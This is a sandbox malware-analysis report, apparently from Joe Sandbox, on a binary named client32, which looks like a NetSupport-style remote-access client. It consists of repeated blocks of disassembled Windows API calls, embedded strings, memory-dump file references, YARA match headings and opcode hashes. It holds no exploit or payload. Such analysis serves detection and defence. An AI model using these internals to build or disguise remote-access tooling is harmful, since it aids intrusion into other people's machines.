                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomDeleteGlobal$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 964255742-0
                                                                                  • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                  • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                  • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                  • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                  • SetFocus.USER32(?), ref: 11007403
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                  • String ID: edit
                                                                                  • API String ID: 1305092643-2167791130
                                                                                  • Opcode ID: 00037790fe496bd16934fd3c2f840e2ff7796c21e72fe7923f6eb13592277569
                                                                                  • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                  • Opcode Fuzzy Hash: 00037790fe496bd16934fd3c2f840e2ff7796c21e72fe7923f6eb13592277569
                                                                                  • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                  APIs
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                  • _memmove.LIBCMT ref: 11009336
                                                                                    • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_$_memmove
• String ID: string too long
• API String ID: 2168136238-2556327735
• Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
• Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
• Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
• Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argument_memmovestd::_
• String ID: string too long
• API String ID: 256744135-2556327735
• Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
• Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
• Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
• Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
APIs
• _calloc.LIBCMT ref: 1103B162
• _free.LIBCMT ref: 1103B25B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
• String ID: CLTCONN.CPP
• API String ID: 183652615-2872349640
• Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
• Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
• Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
• Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 1108F7BC
• __CxxThrowException@8.LIBCMT ref: 1108F7D1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID: L
• API String ID: 1338273076-2909332022
• Opcode ID: fdd4c84c0dfc47c488fbb0e8ce0575bb2a84a8c934a13f54452f88a1b8797c7d
• Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
• Opcode Fuzzy Hash: fdd4c84c0dfc47c488fbb0e8ce0575bb2a84a8c934a13f54452f88a1b8797c7d
• Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
APIs
• _memset.LIBCMT ref: 110AD1E3
  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
• FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
Strings
• winscard.dll is NOT valid!!!, xrefs: 110AD1FD
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad_memset
• String ID: winscard.dll is NOT valid!!!
• API String ID: 212038770-1939809930
• Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
• Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
• Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
• Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
• String ID: string too long
• API String ID: 963545896-2556327735
• Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
• Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
• Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
• Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
APIs
• GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
• SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemText
• String ID: ...
• API String ID: 3367045223-440645147
• Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
• Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
APIs
• ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
  • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                                  • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                                  Strings
                                                                                  • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                  • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                  • API String ID: 2940908497-693965840
                                                                                  • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                  • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                  • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                  • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                  APIs
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassNameProcessThreadWindow
                                                                                  • String ID: tooltips_class32
                                                                                  • API String ID: 2910564809-1918224756
                                                                                  • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                  • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                  • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                  • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                    • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                    • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                  • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                  • _memset.LIBCMT ref: 11039216
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                  • String ID: 648351
                                                                                  • API String ID: 3037201586-3609006686
                                                                                  • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                  • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                  • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                  • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(00020019,?,00000000,50D94AA1,00000000,00020019,?,00000000), ref: 110ED600
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValuewvsprintf
                                                                                  • String ID: ($Error %d getting %s
                                                                                  • API String ID: 141982866-3697087921
                                                                                  • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                  • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                  • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                  • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                  • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                  • API String ID: 2102423945-1777407139
                                                                                  • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                  • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                  • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                  • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                  Strings
                                                                                  • Error. NULL capbuf, xrefs: 1100B6A1
